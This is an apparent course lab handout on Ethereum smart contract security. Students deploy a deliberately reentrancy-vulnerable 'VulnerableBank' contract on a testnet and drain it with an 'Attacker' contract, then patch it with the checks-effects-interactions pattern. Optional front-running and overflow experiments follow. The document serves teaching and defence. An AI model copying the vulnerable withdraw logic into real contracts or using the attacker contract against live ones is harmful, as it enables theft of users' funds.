Blockchain Security & Smart Contract Exploitation Lab

Overview

This lab introduces students to smart contract security by deploying vulnerable code on Ethereum testnets and executing common Web3 exploits. You’ll analyze and patch contract weaknesses while exploring blockchain’s role in cybersecurity.

Lab Instructions

1. Setting Up Your Environment

You will need:

A browser with Remix IDE
Alternatively: install Node.js, Hardhat, and Ganache locally
A MetaMask wallet connected to the Goerli testnet (or use local testing network)

2. Deploy a Vulnerable Smart Contract

Paste this Solidity code into Remix:

// SPDX-License-Identifier: MIT
pragma solidity ^0.8.0;

contract VulnerableBank {
    mapping(address => uint) public balances;

    function deposit() public payable {
        balances[msg.sender] += msg.value;
    }

    function withdraw() public {
        require(balances[msg.sender] > 0);
        payable(msg.sender).call{value: balances[msg.sender]}("");
        balances[msg.sender] = 0;
    }
}

🛑 This contract is vulnerable to a reentrancy attack.

Deploy it on Remix with Injected Web3 or Hardhat localnet.

3. Exploit the Vulnerability

Deploy an attacker contract to exploit the withdraw() logic:

contract Attacker {
    VulnerableBank public bank;

    constructor(address _bank) {
        bank = VulnerableBank(_bank);
    }

    fallback() external payable {
        if (address(bank).balance > 0) {
            bank.withdraw();
        }
    }

    function attack() public payable {
        bank.deposit{value: msg.value}();
        bank.withdraw();
    }

    function getBalance() public view returns (uint) {
        return address(this).balance;
    }
}

Test the exploit and observe how funds are drained through recursion.

📝 Checkpoint: Capture a screenshot of the attack in progress and note the balance changes.

4. Patch the Vulnerability

Refactor the original contract to use the checks-effects-interactions pattern:

function withdraw() public {
    uint amount = balances[msg.sender];
    require(amount > 0);
    balances[msg.sender] = 0;
    payable(msg.sender).transfer(amount);
}

Test that the attack fails after applying the patch.

5. Explore Additional Attack Vectors (Optional)

Front-running: Use a script or testing framework to simulate transaction ordering attacks
Integer overflow/underflow: Try using older versions of Solidity (pre-0.8) without SafeMath
Logic bugs: Misconfigured access control or hidden backdoors

6. Bonus: Blockchain Logging and Integrity Use Case

Design a simple smart contract that stores hashed log entries:

contract SecureLogger {
    event LogWritten(bytes32 indexed hash, uint timestamp);

    function writeLog(bytes32 hash) public {
        emit LogWritten(hash, block.timestamp);
    }
}

Discuss how this could support tamper-proof audit trails.

Final Submission

Submit a report that includes:

Your deployed contract addresses and screenshots of exploits
Patched contract code and confirmation of fix
A short write-up on blockchain’s potential and risks in cybersecurity

🚀 You’ve just executed and mitigated your first blockchain exploit! 🚀

Blockchain Security & Smart Contract Exploitation Lab#

Overview#

Lab Instructions#

1. Setting Up Your Environment#

2. Deploy a Vulnerable Smart Contract#

3. Exploit the Vulnerability#

4. Patch the Vulnerability#

5. Explore Additional Attack Vectors (Optional)#

6. Bonus: Blockchain Logging and Integrity Use Case#

Final Submission#